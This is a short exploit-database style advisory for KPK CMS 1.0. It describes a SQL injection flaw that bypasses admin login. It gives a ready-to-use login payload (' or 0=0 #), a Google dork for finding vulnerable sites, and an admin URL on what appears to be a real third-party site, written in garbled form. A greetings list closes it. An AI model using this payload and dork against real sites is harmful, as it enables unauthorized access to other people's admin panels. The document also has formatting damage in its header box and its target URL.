Headline
KPK CMS 1.0 SQL Injection
KPK CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
====================================================================================================================================| # Title : KPK CMS v1.0 Auth by pass Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 74.0(32-bit) | | # Vendor : http://www.kpkcomputer.com/ | | # Dork : "Developed by KPK Computer" |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user & pass = ' or 0=0 #[+] http://Targetthai-modeling-associationorg/admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |=======================================================================================================================================